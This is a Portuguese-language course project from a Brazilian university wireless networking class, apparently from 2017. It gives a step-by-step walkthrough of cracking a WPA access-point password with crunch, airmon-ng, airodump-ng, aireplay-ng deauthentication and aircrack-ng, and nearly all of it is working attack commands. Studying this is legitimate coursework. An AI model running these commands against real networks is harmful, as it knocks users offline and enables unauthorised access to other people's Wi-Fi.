Você está na página 1de 10

CENTRO UNIVERSITÁRIO SENAC

TECNOLOGIA EM REDES DE COMPUTADORES

São Paulo
2017
Redes sem Fio

Projeto apresentado ao Centro Universitário


SENAC – Campus Santo Amaro, como requisito
para a conclusão da disciplina – Redes Sem Fio

Professor OrientadorSergio Tavares

Alex Reis Amorim

Jaildo dos Santos Souza

Maibe Gomes Vieira Lima

São Paulo

2017
Processo de descoberta de rede wireless utilizando a ferramenta
aircrack

Criando wordlist para facilitar o processo de comparação do aircrack

#crunch

#crunch 8 8 senha@10 -t sen@@@@@ -o /home/maibe/Documentos/wordlist

Wordlist criada no diretório escolhido /home/maibe/Documentos/wordlist


Para o processo de captura do ponto de aceeso é nescessario deixar a placa
de rede wireless em modo Promiscuo(monito) para isso utilizaremos a ferramenta
airmon-ng

#airmon-ng

#airmon-ng start wlp12s0


Temos que interromper os processos que estão habilitados para que não
ocorra interferencias no processo de captura do ponto de acesso digitando o
commando kill + PID ou nome do processo

# Kill 394

# kill 415

#kill 486

Após executar esse comando será criada uma interface de rede com a nomenclatura
“mon0”, essa interface será responsável por capturar todos os pacotes que
precisamos para descriptografar a senha wep ou wpa.

Para verificar se a placa de rede está no modo Promiscuo digite o commando:

# ip address show
Efetuando a busca de pontos de acessos alvo

# airodump-ng wlp12s0mon

Nesta tela obtemos informaçoes sobre o alvo, como perda de sina, canal que
ele está conectado e tipo de autenticação que ele está utilizando e o seu endereço
mac identificado como bssid.
Agora que temos informaçoes suficientes vamos conectar ao ponto de
acesso e descobrir quais dispositivos estão conectados a ele.

# airodump-ng --write tplink --channel 10 --bssid 64:70:02:93:F6:A8


wlp12s0mon

Quando um cliente sem fio autentica com a AP, os dois passam pelo processo
de autenticação de 4 etapas chamado 4-way handshake. Durante essas trocas de
mensagens, a senha compartilhada é derivado entre AP e cliente sem fio, sem ser
transmitida em qualquer dessas mensagens EAP.

Enviando solicitação de desaltenticação de ponto de acesso no cliente bssid


68:94:23:4B:7F:84 para este processo precisamos abrir um novo terminal e logar
como root, deixando o outro serviço aberto para receber a mensagem de handshak
aireplay-ng --deauth 5 -a 64:70:02:93:F6:A8 -c 68:94:23:4B:7F:84 wlp12s0mon

Nesta tela foi enviado 5 solicitaçoes de desaltenticação no ponto de acesso


68:94:23:4B:7F:84 fazendo com que o cliente se reconecte novamente ao se
conectar fazemos o aperto de mão e recebemos um retorno de handshak
confirmando que já temos todas informaçoces sobre o dispositivo após isto ja
podemos interrromper o serviços que está aberto.
Iremos fazer a descoberta da senha utilizando as informaçoes obtida na
captura e compara-la com a word list que criamos

# aircrack-ng /home/maibe/workspace/tplink-01.cap -w
/home/maibe/Documentos/wordlist
Tela exibindo a descoberta da senha do ponto de acesso